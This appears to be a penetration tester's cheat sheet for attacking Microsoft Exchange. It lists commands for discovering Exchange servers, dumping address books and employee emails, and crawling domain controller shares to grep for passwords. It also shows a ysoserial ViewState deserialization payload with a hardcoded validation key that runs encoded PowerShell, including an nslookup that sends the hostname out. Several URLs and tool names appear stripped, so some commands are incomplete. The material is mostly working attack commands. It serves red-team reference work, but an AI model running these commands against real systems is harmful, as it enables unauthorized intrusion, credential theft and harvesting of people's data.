Discover Exchange servers on the Perimeter from a large scope of subdomains:

$ cat subdomains.txt

$ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr [] [] []

Check its build number and correlate it with release dates:

$ curl -sSL | grep favicon.ico
<link rel="shortcut icon" href="/owa/auth/15.2.1118/themes/resources/favicon.ico" type="image/x-icon">



$ ./ruler -k -d -u snovvcrash -p 'Passw0rd!' -e --verbose abk dump -o gal.txt


PS > Get-GlobalAddressList -ExchHostname -UserName MEGACORP\snovvcrash -Password 'Passw0rd!' -OutFile gal.txt


Search for <OABUrl> node using Burp:

POST /autodiscover/autodiscover.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Authorization: Basic TUVHQUNPUlBcc25vdnZjcmFzaDpQYXNzdzByZCEK
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 350

<Autodiscover xmlns="">

Or with a Python script:

$ ./ MEGACORP/snovvcrash:'Passw0rd!' -e ''
[*] Authenticated users's SID (X-BackEndCookie): S-1-5-21-3167813660-1240564177-918740779-3102
[+] DisplayName: Sam Freeside
[+] Server:
[+] AD:
[+] OABUrl:<OABUrl>/

Get oab.xml and then oab.lzx:

$ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!'<OABUrl>/oab.xml > oab.xml
$ cat oab.xml | grep '.lzx' | grep data
$ curl -k --ntlm -u 'MEGACORP\snovvcrash:Passw0rd!'<OABUrl>/<LZXUrl> > oab.lzx

Install libmspack:

$ git clone ~/tools/libmspack && cd ~/tools/libmspack/libmspack
$ sudo apt install autoconf automake libtool -y
$ ./ && ./configure && make && cd -

Parse oab.lzx into oab.txt and extract emails from oab.txt with a regexp:

$ ~/tools/libmspack/libmspack/examples/oabextract oab.lzx oab.txt
$ strings oab.txt | egrep -o "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}" | sort -u > emails.txt




$ git clone ~/tools/peas-m && cd ~/tools/peas-m
$ python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate
(venv) $ pip install --upgrade 'setuptools<45.0.0'
(venv) $ pip install -r requirements.txt


$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --check
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --list-unc='\\DC01'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --list-unc='\\DC01\SYSVOL\'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --dl-unc='\\DC01\share\file.txt'
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --dl-unc='\\DC01\share\file.txt' -o file.txt
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --crawl-unc='\\DC01\share\' [--pattern xml,ini] [--download]
$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --brute-unc [--prefix srv]


1. Use Nmap http-ntlm-info to get NetBIOS domain name and Exchange hostname: hunting for hostname pattern prefix if there is one.

2. Locate DC (guess it trying hostname pattern prefix) and mirror \\DC01\SYSVOL\megacorp.local\ share with --crawl-unc function:

$ python -m peas -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' --crawl-unc='\\DC01\SYSVOL\\' --download

3. Find, xargs and grep for keywords in files: password, NetBIOS domain name (for additional account names), hostname pattern prefix (for additional hosts/shares):

$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i -e password -e pass
$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <DOMAIN_NETBIOS_NAME>
$ find . -type f -print0 | xargs -0 grep -v PolicyDefinitions | grep -i <PREFIX>

4. (optional) Brute other share names:

$ python -m peas --brute-unc -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' [--prefix srv]


Get ViewStateUserKey: Browser > F12 > Storage > ASP.NET_SessionId
Get ViewStateGenerator: Browser > F12 > Console > document.getElementById("__VIEWSTATEGENERATOR").value
PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$name = hostname;nslookup "$"'))
PS > .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc <BASE64_CMD>" --validationalg "SHA1" --validationkey "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --viewstateuserkey "<VIEWSTATE>" --generator "<GENERATOR>" --islegacy --isdebug<GENERATOR>&__VIEWSTATE=<VIEWSTATE>


List Address Books and count entities in every one of them:

$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi list-tables -count

Dump any specified Address Book by its name or GUID:

$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi dump-tables -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type EXTENDED -output-file gal.txt
$ cat gal.txt | grep 'mail,' | sort -u | awk -F' ' '{print $3}' > emails.txt

Return AD objects by their GUIDs:

PS > (Get-ADuser -Identity snovvcrash).ObjectGUID
$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi guid-known -guid 00ff00ff-00ff-00ff-00ff-00ff00ff00ff -lookup-type FULL

Dump all AD records via requesting DNTs:

$ MEGACORP/snovvcrash:'Passw0rd!' -debug nspi dnt-lookup -lookup-type EXTENDED -start-dnt 0 -stop-dnt 500000 -output-file dnt-dump.txt

Last updated